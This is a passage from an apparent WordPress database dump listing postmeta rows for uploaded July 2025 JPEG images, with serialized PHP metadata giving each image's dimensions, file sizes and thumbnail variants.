";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5050,1817,'_wp_attached_file','2025/07/S__9871452_0.jpg'),
(5051,1817,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871452_0.jpg\";s:8:\"filesize\";i:363375;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871452_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16820;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871452_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132337;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871452_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6914;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871452_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82938;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871452_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18641;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5052,1818,'_wp_attached_file','2025/07/S__9871394_0.jpg'),
(5053,1818,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871394_0.jpg\";s:8:\"filesize\";i:370167;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871394_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23382;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871394_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145186;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871394_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9536;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871394_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96303;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871394_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5054,1819,'_wp_attached_file','2025/07/S__9871451_0.jpg'),
(5055,1819,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871451_0.jpg\";s:8:\"filesize\";i:363375;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871451_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16820;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871451_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132337;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871451_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6914;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871451_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82938;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871451_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18641;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5056,1820,'_wp_attached_file','2025/07/S__9871453_0.jpg'),
(5057,1820,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871453_0.jpg\";s:8:\"filesize\";i:370167;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871453_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23382;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871453_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145186;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871453_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9536;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871453_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96303;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871453_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5058,1821,'_wp_attached_file','2025/07/S__9871393_0.jpg'),
(5059,1821,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871393_0.jpg\";s:8:\"filesize\";i:375272;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871393_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24737;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871393_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150225;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871393_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10277;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871393_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99950;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871393_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24057;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5060,1822,'_wp_attached_file','2025/07/S__9871391_0.jpg'),
(5061,1822,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871391_0.jpg\";s:8:\"filesize\";i:431702;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871391_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22740;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871391_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159941;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871391_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8899;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871391_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102401;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871391_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23031;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5062,1823,'_wp_attached_file','2025/07/S__9871396_0.jpg'),
(5063,1823,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:24:\"2025/07/S__9871396_0.jpg\";s:8:\"filesize\";i:358595;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871396_0-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19234;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871396_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137603;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871396_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7545;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__9871396_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137603;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871396_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18839;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5064,1824,'_wp_attached_file','2025/07/S__9871397_0.jpg'),
(5065,1824,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871397_0.jpg\";s:8:\"filesize\";i:362079;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871397_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22717;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871397_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141899;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871397_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9523;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871397_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93642;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871397_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23670;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5066,1825,'_wp_attached_file','2025/07/S__9871398_0.jpg'),
(5067,1825,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871398_0.jpg\";s:8:\"filesize\";i:394496;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871398_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22696;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871398_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151134;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871398_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9228;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871398_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98416;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871398_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23855;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5068,1826,'_wp_attached_file','2025/07/S__9871400_0.jpg'),
(5069,1826,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871400_0.jpg\";s:8:\"filesize\";i:417943;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871400_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20463;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871400_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157084;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871400_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8011;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871400_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100487;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871400_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20117;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5070,1827,'_wp_attached_file','2025/07/S__9871395_0.jpg'),
(5071,1827,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871395_0.jpg\";s:8:\"filesize\";i:363375;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871395_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16820;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871395_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132337;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871395_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6914;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871395_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82938;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871395_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18641;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5072,1828,'_wp_attached_file','2025/07/S__9871401_0.jpg'),
(5073,1828,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871401_0.jpg\";s:8:\"filesize\";i:302811;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871401_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22551;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871401_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125495;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871401_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9370;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871401_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84679;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871401_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20799;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5074,1829,'_wp_attached_file','2025/07/S__9871399_0.jpg'),
(5075,1829,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871399_0.jpg\";s:8:\"filesize\";i:419477;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871399_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21832;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871399_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162004;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871399_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8522;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871399_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103918;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871399_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20891;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5076,1830,'_wp_attached_file','2025/07/S__9871420_0.jpg'),
(5077,1830,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871420_0.jpg\";s:8:\"filesize\";i:431408;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871420_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22280;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871420_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:158875;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871420_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8859;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871420_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101938;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871420_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24647;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5078,1831,'_wp_attached_file','2025/07/S__9871374_0.jpg'),
(5079,1831,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871374_0.jpg\";s:8:\"filesize\";i:430864;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871374_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21833;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871374_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157401;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871374_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8721;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871374_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100546;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871374_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24314;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s